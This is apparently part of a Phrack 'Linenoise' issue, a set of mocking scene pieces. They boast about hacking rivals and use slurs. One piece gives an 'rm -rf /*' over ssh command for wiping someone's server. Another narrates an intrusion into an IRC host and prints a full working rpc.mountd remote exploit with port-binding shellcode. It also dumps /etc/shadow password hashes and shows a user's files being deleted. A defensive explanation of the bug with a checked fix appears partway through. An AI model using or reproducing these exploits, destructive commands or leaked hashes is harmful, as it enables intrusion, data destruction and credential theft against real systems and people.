                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x0f

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|




--[ Contents

  1 - A Phrack Editorial Correction
  2 - A Phrack Editorial Correction Part II
  3 - Getting the rm -rf d0wn p@
  4 - This is What Happens When You Talk Shit
  5 - Keeping 0day Safe
  6 - Tripwire is Silly
  7 - Evil Shellcode Developments
  8 - Really Dangerous Cisco Shit Released
  9 - The Defcon Review
 10 - pr0ix IRC Medley
 11 - Project Honeynet Enumeration
 12 - Sebek Sucks
 13 - Bluebox Infoz




|=[ 0x01 ]=--------------------------------------------------------------=|

A Phrack Editorial Correction
by an apologetic phr4ck-st4ff

Phrack would like to apologize for a misprint in our phrack 61 edition!
Apparently the table of contents read as such: "Polymorphic Shellcode Engine
(.txt) 3 gay d00dz"
This should be amended to say "4 gay d00dz" as there were four authors: 
theo detristan theo@ringletwins.com
tyll ulenspiegel tyllulenspiegel@altern.org
yann_malcom yannmalcom@altern.org 
mynheer superbus von underduk msvu@ringletwins.com 
Our wonderful phrack authors were very upset by this misprint, and we would
like to say sorry for neglecting any of our gay gay dungeons+dragonz playing
friends.




|=[ 0x02 ]=--------------------------------------------------------------=|

A Phrack Editorial Correction Part II
by an apologetic phr4ck-st4ff

O'Reilly is suing phrack magazine for plagiarism!
Apparently Hijacking Linux Page Fault Handler (.txt) by "buffer" was ripped
directly from the O'Reilly's Understanding the Linux Kernel series,
practically word-for-word.
Stand by and join hands while phrack staff laughs, since phrack isn't subject
to copyright laws. In fact, phrack isn't subject to any human laws!




|=[ 0x03 ]=--------------------------------------------------------------=|

Getting the rm -rf d0wn p@
by Kar3l3ss k4rl

the other day some faggot on efnet was talking shit 2 me so i decided to
take him out.
i fired up kontr0l p4n3l | stored user names and passwords
i did a whois on irc to find his host name, found the box in my big list,
and then i issued something like the following on my shell:
ssh -lroot blah.com "rm -rf /*" &
and i left the process in the background to do its magic, assuming it would
disconnect me when the computer was obliter8d.
imagine my surpr1ze when my target continued talking shit on irc a few minutes
later. apparently, some variantz where rm is aliased to 'rm -i' prevent rm -rf
madness!
thus my stealthy hard drive removal failed!

the "rm -i" alias stopping attacks is a very real threat!
our solution was swift and simple:
always be sure to issue the following command:
yes | ssh -lroot blah.com "rm -rf /*" &




|=[ 0x04 ]=--------------------------------------------------------------=|

This is What Happens When You Talk Shit
by the b1g leb0wsk1


2nd Sept 2003 - pr0ix wages war on #phrack

<dvdman_> greets pr0ix
<pr0ix> greets dvd
<dvdman_> you gonna give phrack hell?
<pr0ix> yeah
<dvdman_> cool
<pr0ix> fuck then rad up stargliders.org/phrack/opencult/
<dvdman_> add a few ./s for me
<dvdman_> "{
<pr0ix> they are toooooooooo gay
<dvdman_> :P even
---
a bit later
---
<dvdman_> im guessing SLY packet kid is you?
<pr0ix> lets DDDOS them
<dvdman_> HAA
<dvdman_> open a nice bgp
---

After the clear threat of DDoS from the self-proclaimed "Prince of packets" pr0ix, #phrack strikes back...

.----------------------------------------- --  -
| pr0ix (pr0ix@apollo.hack.co.za) (South Africa)
: ircname  : no justice - no peace
| server   : irc.servercentral.net (chase the dragon)

-:- BitchX: Checking tables...
-:- BitchX: nslookup of pr0ix!pr0ix@apollo.hack.co.za failed.

Hmmm... pr0ix thinks his spoof can protect him but thanks to an anonymous supporter,

-gaypr0ix(d0rknet@i.hate.pr0ix)- pr0ix is on irc.scservers.com.

evil:~# host irc.scservers.com
irc.scservers.com       A       64.202.97.154
evil:~#

Ok, let's see if our unpublished 0dayz will work? :PpPPpPPpPPPpPpPpPp

evil:~# nc irc.scservers.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 05 Sep 2003 16:25:37 GMT
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux)

Let's go...

evil:~# ./a.out -v64.202.97.154 -p80 -o12 -t6

Attacking 64.202.97.154:80 - Apache 1.3.27

progress[#######]

Linux irc.scservers.com 2.4.1-008stab043.15.swsoft-smp #1 SMP Thu Mar 20 16:47:30 MSK 2003 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)
id pr0ix
uid=512(pr0ix) gid=512(pr0ix) groups=512(pr0ix)
#hohoho time for more skillz

whereis suexec
suexec: /usr/sbin/suexec /usr/share/man/man8/suexec.8.gz
ls -al /usr/sbin/suexec
-r-s--x---    1 root     apache      11732 May 15 06:09 /usr/sbin/suexec
cat << EOF >> suexp.c
/* REMOVED - sorry kids
 * Phrack supports Non-disclosure
 */
EOF
make suexp
cc     suexp.c   -o suexp
./suexp -t6
id
uid=0(root) gid=0(apache) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
#h3h3h3

ps ax | grep pr0ix
29004 pts/0    S      0:21 BitchX pr0ix irc.servercentral.net
 7200 pts/6    S      0:00 grep pr0ix
ls -al ~pr0ix

total 26731
drwx------    6 pr0ix    pr0ix        2048 Sep  5 08:26 .
drwxr-xr-x   37 root     root         1024 Aug 26 08:47 ..
-rw-rw-r--    1 pr0ix    pr0ix           5 Jan 10  2003 1
-rw-r--r--    1 pr0ix    pr0ix     5261404 Jan 16  2003 8310mcu554.zip
-rw-r--r--    1 pr0ix    pr0ix        3975 Sep  5 03:15 ao.tgz
-rw-------    1 pr0ix    pr0ix       13253 Sep  5 08:26 .bash_history
-rw-rw-r--    1 pr0ix    pr0ix      144847 Dec 26  2002 .bash_history.save
-rw-r--r--    1 pr0ix    pr0ix          24 Oct  7  2002 .bash_logout
-rw-r--r--    1 pr0ix    pr0ix         244 Oct  7  2002 .bash_profile
-rw-r--r--    1 pr0ix    pr0ix         124 Oct  7  2002 .bashrc
drwx------    4 pr0ix    pr0ix        1024 Aug 29 06:15 .BitchX
-rw-rw-r--    1 pr0ix    pr0ix          36 Jul 29 02:36 .bitchxrc
-rw-r--r--    1 pr0ix    pr0ix       80687 Aug  5 09:19 blah2.jpg
-rw-r--r--    1 pr0ix    pr0ix       61861 Aug  6 11:47 blah.jpg
-rw-r--r--    1 pr0ix    pr0ix      816279 Jan 16  2003 b.zip
-rw-r--r--    1 pr0ix    pr0ix      441952 Aug 11 09:13 CANVAS3_VivianLi.rar
-rw-r--r--    1 pr0ix    pr0ix     2353357 Aug  6 11:48 cv4.zip
-rw-r--r--    1 pr0ix    pr0ix       15836 Aug  5 08:49 dcom.c
-rw-r--r--    1 pr0ix    pr0ix       15836 Aug  5 08:53 dcom-cygwin-harq.c
-rw-r--r--    1 pr0ix    pr0ix       14336 Aug  5 08:53 dcom-cygwin-harq.exe
-rw-r--r--    1 pr0ix    pr0ix       18983 Aug  5 09:18 dcom-liunx-harq
-rw-r--r--    1 pr0ix    pr0ix       14822 Aug  5 09:18 dcom-liunx-harq.c
-rw-rw-r--    1 pr0ix    pr0ix         487 Jun  7  2002 FILE_ID.DIZ
-rw-rw-r--    1 pr0ix    pr0ix        2621 Jul 25 10:17 heh
-rw-r--r--    1 pr0ix    pr0ix        4070 Aug 11 09:08 mircexploit-v6.03.c
drwxr-xr-x    2 pr0ix    pr0ix        1024 Jan 10  2003 .ncftp
-rw-rw-r--    1 pr0ix    pr0ix        1356 Mar 13  2000 new.c
-rw-rw-r--    1 pr0ix    pr0ix      286795 Jun  7  2002 NOKIA_8310_SERVICE_BULLETIN_v1_0-ROYAL.rar
-rw-r--r--    1 pr0ix    pr0ix       12058 Jul 23 02:24 opcode.exe
-rw-rw-r--    1 pr0ix    pr0ix      825624 Jan 10  2003 Picture 001.jpg
drwxr-xr-x    2 pr0ix    pr0ix        1024 Jan 16  2003 public_html
-rw-r--r--    1 pr0ix    pr0ix      794624 Aug  6 08:33 RetinaRPCDCOM.exe
-rw-r--r--    1 pr0ix    pr0ix      290419 Jan 16  2003 rn8310sb.zip
-rw-rw-r--    1 pr0ix    pr0ix       12945 Jan  9  2003 root.c
-rw-rw-r--    1 pr0ix    pr0ix       15681 Jun  8  2002 ROYAL.NFO
-rw-r--r--    1 pr0ix    pr0ix       22317 Aug  4 14:52 rpc-int.exe
-rw-r--r--    1 pr0ix    pr0ix       16384 Aug  6 10:15 rpctest-1026.exe
-rw-r--r--    1 pr0ix    pr0ix       16384 Aug  6 08:28 rpctest.exe
-rw-r--r--    1 pr0ix    pr0ix       11712 Aug  6 08:28 rpctest.rar
-rw-r--r--    1 pr0ix    pr0ix       12834 Apr 19 05:48 sormount.c
drwx------    2 pr0ix    pr0ix        1024 Sep  1 07:23 .ssh
-rw-rw-r--    1 pr0ix    pr0ix    15384575 Aug  5 05:31 synlog1
-rw-r--r--    1 pr0ix    pr0ix         349 Apr 21 13:41 targets
-rw-r--r--    1 pr0ix    pr0ix       15305 Aug  4 14:42 universal.c.txt
-rw-r--r--    1 pr0ix    pr0ix           0 Aug 20 04:39 upload.html
-rwxrwxr-x    1 pr0ix    pr0ix         112 May 14  2002 vhosts.sh
-rw-------    1 pr0ix    pr0ix        1778 Aug 26 04:33 .viminfo
-rw-r--r--    1 pr0ix    pr0ix       17025 Jul 31 02:47 win32dcom.cpp
-rw-r--r--    1 pr0ix    pr0ix      159802 Aug 11 02:21 win32dcom.exe
-rw-rw-r--    1 pr0ix    pr0ix       85136 Aug 30 18:04 zasta.JPG
-rw-r--r--    1 pr0ix    pr0ix       10240 Oct 14  2002 zones.tar
#HmMmmMMMmmMMm... pr0ix needs to get more codes for us :((((
#At phrack we like to give something back to our supporterz

cat sormount.c

/*
 * remote exploit for rpc.mountd (nfs-utils <= 1.0.3)
 * by sorbo (sorbox@yahoo.com)
 * http://www.darkircop.org
 *
 * The problem lies in xlog() where the following code exists:
 * if ((n = strlen(buff)) > 0 && buff[n-1] != '\n') {
 *      buff[n++] = '\n'; buff[n++] = '\0';
 * }
 *
 * a NULL byte will overflow buff, thus overwriting the LSB of the frame pointer.
 *
 * We do not control the area pointed by the new frame pointer, but we do control the area
 * of &hp (in auth_authenticate()), thus we can overwrite hp and make it point to an area we like.
 * hp will get free()d so we can make it point to our fake chunk which can overwrite ebp+4, which 
 * is the area ret will look for its return address (when ebp is copied to stack pointer and the 
 * ret is popped when leaving auth_authenticate()). 
 *
 * Have fun
 *
 * Greetz: gunzip@ircnet
 *
 */



#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <rpcsvc/mount.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
                     



char shellcode[] =
/* port bind tcp/30464 ***/

/* jump 10 */
"\xeb\x0a"
/* overwritten bit */
"neveznevez"

/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0"                      // xorl    %eax,%eax
"\x31\xdb"                      // xorl    %ebx,%ebx
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x31\xd2"                      // xorl    %edx,%edx
"\xb0\x66"                      // movb    $0x66,%al
"\xb3\x01"                      // movb    $0x1,%bl
"\x51"                          // pushl   %ecx
"\xb1\x06"                      // movb    $0x6,%cl
"\x51"                          // pushl   %ecx
"\xb1\x01"                      // movb    $0x1,%cl
"\x51"                          // pushl   %ecx
"\xb1\x02"                      // movb    $0x2,%cl
"\x51"                          // pushl   %ecx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\xcd\x80"                      // int     $0x80

/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin,  sizeof(sin) ) */
"\xb3\x02"                      // movb    $0x2,%bl
"\xb1\x02"                      // movb    $0x2,%cl
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x51"                          // pushl   %ecx
"\x51"                          // pushl   %ecx
"\x51"                          // pushl   %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77"                  // addb    $0x77,%cl
"\x66\x51"                      // pushl   %cx
"\xb1\x02"                      // movb    $0x2,%cl
"\x66\x51"                      // pushw   %cx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\xb2\x10"                      // movb    $0x10,%dl
"\x52"                          // pushl   %edx
"\x51"                          // pushl   %ecx
"\x50"                          // pushl   %eax
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\x89\xc2"                      // movl    %eax,%edx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x66"                      // movb    $0x66,%al
"\xcd\x80"                      // int     $0x80

/* listen(fd, 1) */
"\xb3\x01"                      // movb    $0x1,%bl
"\x53"                          // pushl   %ebx
"\x52"                          // pushl   %edx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x66"                      // movb    $0x66,%al
"\x80\xc3\x03"                  // addb    $0x3,%bl
"\xcd\x80"                      // int     $0x80

/* cli = accept(fd, 0, 0) */
"\x31\xc0"                      // xorl    %eax,%eax
"\x50"                          // pushl   %eax
"\x50"                          // pushl   %eax
"\x52"                          // pushl   %edx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\xb3\x05"                      // movl    $0x5,%bl
"\xb0\x66"                      // movl    $0x66,%al
"\xcd\x80"                      // int     $0x80

/* dup2(cli, 0) */
"\x89\xc3"                      // movl    %eax,%ebx
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x3f"                      // movb    $0x3f,%al
"\xcd\x80"                      // int     $0x80

/* dup2(cli, 1) */
"\x41"                          // inc     %ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x3f"                      // movl    $0x3f,%al
"\xcd\x80"                      // int     $0x80

/* dup2(cli, 2) */
"\x41"                          // inc     %ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x3f"                      // movb    $0x3f,%al
"\xcd\x80"                      // int     $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"\x31\xdb"                      // xorl    %ebx,%ebx
"\x53"                          // pushl   %ebx
"\x68\x6e\x2f\x73\x68"          // pushl   $0x68732f6e
"\x68\x2f\x2f\x62\x69"          // pushl   $0x69622f2f
"\x89\xe3"                      // movl    %esp,%ebx
"\x8d\x54\x24\x08"              // leal    0x8(%esp),%edx
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x51"                          // pushl   %ecx
"\x53"                          // pushl   %ebx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x0b"                      // movb    $0xb,%al
"\xcd\x80"                      // int     $0x80

/* exit(%ebx) */
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x01"                      // movb    $0x1,%al
"\xcd\x80";                     // int     $0x80



/* OK here are the instructions to get offsets:
 * align:
 * gdb /usr/sbin/rpc.mountd <pid of mountd>
 * press c
 * run ./exploit -t 1 -a 0 -v 127.0.0.1
 * it will segfault and do info r edx
 * repeats steps (incrementing align untill edx = 0x4141414e
 *
 * ebp: 
 * gdb, press c, run exploit, it will seg, type up, and info r ebp
 * it should end with 00.. that is ur ebp
 *
 * path:
 * gdb, press c, run exploit, it will seg
 * type maintenance info sections, and get end of .bss section (where heap starts)
 * do something like x/100000bx 0x08058ce4 where  is end of .bss
 * press enter untill you find a bunch of 0x41
 * look for 0x2f    0x41    0x41    0x41
 * 0x2f == '/' which is the start of path. The address of 0x2f is the address of path
 *
 */ 
struct target_info {
        char *desc;             /* description */
        int align;              /* will be 0,1,2,3 */
        int ebp;                /* what ebp will look like once overwritten */
        int path;               /* address of path variable on heap */
};



struct target_info targets[] = {
        { "Slackware 8.1",3,0xbfffe000,0x805d17c },
        { "Slackware 8.0",2,0xbfffe100,0x805d7bc },
        { "Debug (gdb)",0,0xbfffe100,0x41414142 }
};


#define TIMEOUT 5       /* timeout for rpc request in seconds */





bool_t xdr_dirpath(XDR *xdrs, dirpath *objp) {
   return xdr_string(xdrs, objp, MNTPATHLEN);
}



   
/* try to connect to the shell */
void ride(char *ip) {
        fd_set rfds;
        int rd;
        int s;
        struct sockaddr_in s_in;
        char buff[1024];

        s_in.sin_port = htons(30464);
        s_in.sin_family = PF_INET;
        s_in.sin_addr.s_addr = inet_addr(ip);

        s = socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
        if(s < 0) {
                perror("socket()");
                exit(-1);
        }

        if(connect(s,(struct sockaddr *)&s_in,sizeof(s_in)) < 0) {
                close(s);
                return; /* failed */
        }


        /* successs */
        send(s,"id;\n",4,0);

        while(1) {
                FD_ZERO(&rfds);
                FD_SET(0, &rfds);
                FD_SET(s, &rfds);

                if(select(s+1, &rfds, NULL, NULL, NULL) < 1)
                        exit(0);

                if(FD_ISSET(0,&rfds)) {
                        if( (rd = read(0,buff,sizeof(buff))) < 1)
                                exit(0);
                        if( send(s,buff,rd,0) != rd)
                                exit(0);

                }
                if(FD_ISSET(s,&rfds)) {
                        if( (rd = recv(s,buff,sizeof(buff),0)) < 1)
                                exit(0);
                        write(1,buff,rd);
                }
        }
}
 


void exploit(struct target_info target, char *ip) {
        char egg[1024];
        dirpath eggd;
        int *ptr;
        CLIENT *client;
        int s;
        struct sockaddr_in s_in;
        struct timeval tv;
        char chunk[] =  "\xfc\xff\xff\xff"      /* prevsize */
                        "\xfc\xff\xff\xff"      /* size */
                        "\xa1\xff\xff\xbf"      /* junk */
                        "\xa1\xff\xff\xbf"      /* bk */
                        "\xa1\xff\xff\xbf";     /* fd */
                                                                                                        

        /* initial set up note it must start with / */
        memset(egg,'A',sizeof(egg));
        egg[sizeof(egg)-1] = 0;
        egg[0] = '/';


        /* fill up with address of our fake chunk */
        printf("Address of fake chunk= 0x%x\n",target.path+4+8);
        for(ptr = (int*)((char*)egg+target.align+300);ptr < (int*)&egg[sizeof(egg)-6]; ptr++)
                        *ptr = target.path+4+8;        /* addr of fake chunk */


        /* setup our chunk and copy it in egg */
        ptr = (int*)((char*)chunk+12);  /* bk */
        printf("Addr of ret= 0x%x\n",target.ebp+4);
        *ptr = target.ebp+4-12;         /* addr of ret-12 */
        ptr++;                          /* fd */
        printf("Addr of shellcode= 0x%x\n",target.path+40);
        *ptr = target.path+40;          /* addr of shellcode */
        memcpy(egg+4,chunk,strlen(chunk));


        /* copy our shellcode */
        memcpy(egg+40,shellcode,strlen(shellcode));
        eggd = &egg[0];


        /* connect to mountd and send request */
        s = RPC_ANYSOCK;
        s_in.sin_family = PF_INET;
        s_in.sin_port = 0;
        if(!inet_aton(ip,&s_in.sin_addr)) {
                printf("Invalid ip %s\n",ip);
                exit(-1);
        }
   
        client = clnttcp_create(&s_in,MOUNTPROG, MOUNTVERS, &s, 0, 0);
        if(!client) {
                clnt_pcreateerror("clnttcp_create");
                exit(-1);
        }                                                       
        client->cl_auth = authunix_create_default();

        tv.tv_usec = 0;
        tv.tv_sec = TIMEOUT;

        if(clnt_call(client, MOUNTPROC_MNT, (xdrproc_t) xdr_dirpath, (void *)&eggd,(xdrproc_t) xdr_void, NULL,tv) == RPC_SUCCESS) {
                printf("Server managed to mount our path... something went wrong\n");
                exit(-1);
        }

        printf("Exploitation done... attempting to connect to shell\n");
        ride(ip);
        printf("Failed...\n");                                                                                                     
}

void print_targets() {
        int tcount = sizeof(targets)/sizeof(struct target_info);
        int i;

        printf("Id\tDescription\talign\t\tpath\t\tebp\n");

        for(i = 0; i < tcount; i++) {
                printf("%d)\t%s\t%d\t\t0x%x\t0x%x\n",i,
                        targets[i].desc,targets[i].align,targets[i].path,targets[i].ebp);
        }

}


void usage(char *p) {
        printf("Usage: %s <opts>\n",p);
        printf("-t\t\ttarget\n");
        printf("-a\t\talign\n");
        printf("-p\t\tpath\n");
        printf("-e\t\tebp\n");
        printf("-v\t\tvictim ip\n");
        printf("\n");
        print_targets();
        exit(0);
}

int main(int argc, char *argv[]) {
        int opt;
        int t = -1;
        int align = -1;
        int path = -1;
        int ebp = -1;
        char ip[16];

        ip[0] = 0;

        printf("rpc.mountd (nfs-utils <= 1.0.3) remote exploit by sorbo (sorbox@yahoo.com)\n");

        while( (opt = getopt(argc,argv,"t:a:hp:e:v:")) != -1) {
                switch(opt) {
                        case 't':
                                t = atoi(optarg);
                                if(t >= sizeof(targets)/sizeof(struct target_info)) {
                                        printf("Invalid target %d\n",t);
                                        exit(-1);
                                }
                                break;

                        case 'a':
                                align = atoi(optarg);
                                break;

                        case 'p':
                                if(sscanf(optarg,"%x",&path) != 1) {
                                                printf("Invalid path addr\n");
                                                exit(-1);
                                }
                                break;

                        case 'e':
                                if(sscanf(optarg,"%x",&ebp) != 1) {
                                                printf("Invalid ebp addr\n");
                                                exit(-1);
                                }
                                break;

                        case 'v':
                                snprintf(ip,sizeof(ip),"%s",optarg);
                                break;

                        case 'h':
                        default:
                                usage(argv[0]);
                }
        }

        if(t < 0) {
                printf("Select target\n");
                usage(argv[0]);
        }

        if(strlen(ip) == 0) {
                printf("Select victim\n");
                usage(argv[0]);
        }

        if(align != -1)
                targets[t].align = align;
        if(path != -1)
                targets[t].path = path;
        if(ebp != -1)
                targets[t].ebp = ebp;

        printf("Attacking target %s\n",targets[t].desc);
        printf("Align= %d\n",targets[t].align);

        exploit(targets[t],ip);
        exit(0);
}
#WOW thanks phrack!!!
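The header comment of sormount.c above quotes the xlog() pattern behind the bug: the newline-and-terminator append never checks that two more bytes fit, so a line that exactly fills the buffer pushes a single NUL past its end. The following is an added example, not code from the page, from nfs-utils or from sorbo: it places the unchecked append beside a bounds-checked version and runs both on a constructed buffer whose last byte is a guard standing in for whatever follows the buffer on the stack. The buffer size LOGBUF is an assumption for the demo, not the real xlog() size.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Logical size of the log line buffer. Assumption for this demo: the real
 * xlog() buffer size is not given on the page. */
#define LOGBUF 16

/* Unchecked append, the pattern quoted in the sormount.c header comment.
 * When strlen(buff) == LOGBUF-1 (the longest string that fits), the '\n'
 * takes the last slot and the '\0' lands one byte past the buffer. */
void append_newline_unchecked(char *buff) {
    size_t n = strlen(buff);
    if (n > 0 && buff[n - 1] != '\n') {
        buff[n++] = '\n';
        buff[n++] = '\0';
    }
}

/* Checked append: refuse (return -1) unless both extra bytes fit inside
 * bufsize; otherwise return the new strlen(buff). */
int append_newline_checked(char *buff, size_t bufsize) {
    size_t n = strlen(buff);
    if (n > 0 && buff[n - 1] != '\n') {
        if (n + 2 > bufsize)
            return -1;
        buff[n] = '\n';
        buff[n + 1] = '\0';
        n++;
    }
    return (int)n;
}

/* Build a region of LOGBUF+1 bytes: a full LOGBUF-byte buffer holding a
 * maximal string, followed by one guard byte that stands in for whatever
 * sits after the buffer on the stack (the frame pointer's low byte in the
 * real bug). Keeping the guard inside the same array keeps the demo itself
 * memory-safe. */
static void fill_region(char *region) {
    memset(region, 'A', LOGBUF - 1);
    region[LOGBUF - 1] = '\0';
    region[LOGBUF] = (char)0xAA;
}

/* Returns 1 if the unchecked append clobbered the guard byte (it does). */
int unchecked_overflows(void) {
    char region[LOGBUF + 1];
    fill_region(region);
    append_newline_unchecked(region);
    return (unsigned char)region[LOGBUF] != 0xAA;
}

/* Returns 1 if the checked append refused and left the guard intact. */
int checked_refuses(void) {
    char region[LOGBUF + 1];
    int rc;
    fill_region(region);
    rc = append_newline_checked(region, LOGBUF);
    return rc == -1 && (unsigned char)region[LOGBUF] == 0xAA;
}

/* Returns the new length when a short line fits: "abc" becomes "abc\n". */
int checked_fits(void) {
    char region[LOGBUF + 1];
    memset(region, 0, sizeof region);
    strcpy(region, "abc");
    return append_newline_checked(region, LOGBUF);
}

int main(void) {
    printf("unchecked append clobbers guard byte: %d\n", unchecked_overflows());
    printf("checked append refuses full buffer:   %d\n", checked_refuses());
    printf("checked append on short line returns: %d\n", checked_fits());
    return 0;
}
```

The guard byte is overwritten with a single 0x00, which is exactly the off-by-one the comment describes: not a large smash, just the low byte of the next stack slot zeroed. The fix is the explicit room check before writing; an alternative with the same effect is to size the buffer so that the longest line plus two always fits and to reject longer input at the point where the line is built.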

cat /etc/shadow
root:$1$ZJShZBLX$SjDHIWcpO/GA9Dipkod781:11944:0:99999:7:::
bin:*:11915:0:99999:7:::
daemon:*:11915:0:99999:7:::
adm:*:11915:0:99999:7:::
lp:*:11915:0:99999:7:::
sync:*:11915:0:99999:7:::
shutdown:*:11915:0:99999:7:::
halt:*:11915:0:99999:7:::
mail:*:11915:0:99999:7:::
news:*:11915:0:99999:7:::
uucp:*:11915:0:99999:7:::
operator:*:11915:0:99999:7:::
games:*:11915:0:99999:7:::
gopher:*:11915:0:99999:7:::
ftp:*:11915:0:99999:7:::
nobody:*:11915:0:99999:7:::
pcap:!!:11915:0:99999:7:::
apache:!!:11915:0:99999:7:::
mailnull:!!:11915:0:99999:7:::
popa3d:!!:11915:0:99999:7:::
rpm:!!:11915:0:99999:7:::
named:!!:11915:0:99999:7:::
rpc:!!:11915:0:99999:7:::
webadmin:!!:12212:0:99999:7:::
irc:$1$isxQjOdP$6jb3AzTc80L7x3WcCAOF./:12212:0:99999:7:::
ibot:$1$ej3zbkRi$AAY8Xl8Nu9HEJMiNEYvsa/:12212:0:99999:7:::
seiki:$1$l05gX/8m$4I1ILj8n63UameQ5xjTU5/:12212:0:99999:7:::
ara:$1$144rrypI$0lHwNZWRhzJaM4Z.orByK.:12212:0:99999:7:::
darwin:$1$aSsbmEs.$ORLOh7BSFRp44vSpBabwb.:12212:0:99999:7:::
munky:$1$EZOznsYZ$nf1E5sJzcHcRcEHf/zRii1:12212:0:99999:7:::
matthew:$1$LE26nN17$eCfcerAHraiBDREoby7lL1:12212:0:99999:7:::
phelix:$1$4fctwQLD$VNx6x3XEL.FfdbrHUpTBP1:12212:0:99999:7:::
hardy:$1$Fd/NGh3W$GCBjp4D1HQ0H6s9rvueNW/:12212:0:99999:7:::
ident:!!:11942:0:99999:7:::
pr0ix:$1$QE94tcwZ$8jAQqYM4/41TfcguVlvl31:12212:0:99999:7:::
jordan:$1$1off0go6$o29r4O/06IePxER/C67m40:12212:0:99999:7:::
woohah:$1$TWHQOOsM$zKOKWiUg3xwjyJW.hqVh0.:12212:0:99999:7:::
guard:$1$YPOKEA.N$vpINblI9rcqiLSVKwuoF1/:12212:0:99999:7:::
ben:$1$r2m9RMMt$VvMTQP48gzw0ea3oynpwn0:12212:0:99999:7:::
josh:$1$zUB76ytF$nrYsM.IJQ38k0l.Exj8Oh1:12212:0:99999:7:::
mailbox:$1$iAoBTdPK$5jBYGN7NkFEDBPeS.6xJY.:12212:0:99999:7:::
mark:$1$gaxorDr9$HEB0PaTuiRCfy6u9q9nwM/:12212:0:99999:7:::
jsw:$1$VvRVH/ZW$GTszjvXK2d/.hPSayft2G/:12212:0:99999:7:::
syn:$1$PYXWwsBF$A27F8XhxA29FdBCGGCEla.:12212:0:99999:7:::
oiad:$1$2h6x6zGz$F/OtF1.cnoLfIx3fiUVir1:12212:0:99999:7:::
rachel:$1$mWtUDk29$dXrVKWOFGgtOyE1ErJjrm/:12212:0:99999:7:::
douglas:$1$po/d7cUE$v2m0yNiWJoLY2w0i3chZ11:12212:0:99999:7:::
bluerose:$1$HP0fEesQ$5BV0EWfWa9lMXlubq5NcL1:12212:0:99999:7:::
scott:$1$p9J5H0Nw$lTYLtwHboZAu/2k/RFDma1:12212:0:99999:7:::
vcsa:!!:12158:0:99999:7:::
copy:$1$Wvnt5j6M$BxW6elYpZpafw4krGu2HC/:12212:0:99999:7:::
cco:$1$DDCKlJdm$KHb.YwvehZQYaxCcvS2cM0:12212:0:99999:7:::
love:!!:12212:0:99999:7:::
john:$1$CDXsm4w2$xiMBwHTGl7IYtyGfmbosH/:12227:0:99999:7:::
jason:$1$QQl/aoQJ$wGoavhKLO7HsBsdRgmAA3/:12212:0:99999:7:::
sojobo:$1$ewLrMMqk$lfq1IMngSrJxjDfC8pAvO0:12215:0:99999:7:::
fpod:$1$27XuryQQ$3Wk/f9yoQthayOqNB0RnR0:12277:0:99999:7:::
asr:$1$VDZ6Xwti$/FRsuaNxU64rBVaeVP3x8/:12278:0:99999:7:::
mjp:$1$W3bmCP6X$ov1/Qm2FpS.mjdgioDh4e1:12290:0:99999:7:::

#cool! our old friend seiki ;PpPPPpPPpPPppPP

ps ax | grep pr0ix
29004 pts/0    S      0:21 BitchX pr0ix irc.servercentral.net
28828 pts/6    S      0:00 grep pr0ix
kill -9 29004

-:- SignOff pr0ix: #darknet (EOF from client) # bye bye pr0ix :(

w
 12:16pm  up 148 days, 21:00, 10 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
pr0ix    pts/0    reptile.cube11.n Mon 9am  2:15m 30.11s  8.80s  scr-bx 
mjp      pts/2    ool-18b92e85.dyn  8:11am  3:23   0.11s  0.07s  screen -r 
mjp      pts/3    -                 8:11am  4:04m  0.11s  0.11s  /bin/bash 
munky    pts/5    -                 6:51am  2:28m  8:00   8:00   BitchX 
seiki    pts/11   -                10:35am 18:41   2:53   2:53   irssi 
ara      pts/4    -                Tue 8am 25:12m  2:04   2:04   BitchX irc.servercentral.net 
munky    pts/13   207.91.250.66     6:51am  2:28m  0.10s  0.03s  screen -r 
ara      pts/16   209-102-214-3.ip Tue 8am 25:12m  1.10s  1.04s  screen -r 
seiki    pts/18   user-0cceoih.cab 10:27am 18:41   0.11s  0.05s  screen -dr 
mjp      pts/20   -                 8:11am  3:23  18.70s 18.70s  ssh

#ok, im bored now... rm'in time!!!!
rm -rf ~pr0ix
ls -ald ~pr0ix
ls: ~pr0ix: No such file or directory
mkdir /home/pr0ix
chown pr0ix.pr0ix /home/pr0ix
cd /home/pr0ix
touch PHRACK_OWNS_J00

# Phrack 8==================D ~~~~~~~~~ pr0ix

^C
evil:~# ~pr0ix COMING SOON !!!




|=[ 0x05 ]=--------------------------------------------------------------=|

Keeping 0day safe
by anonymous

/*
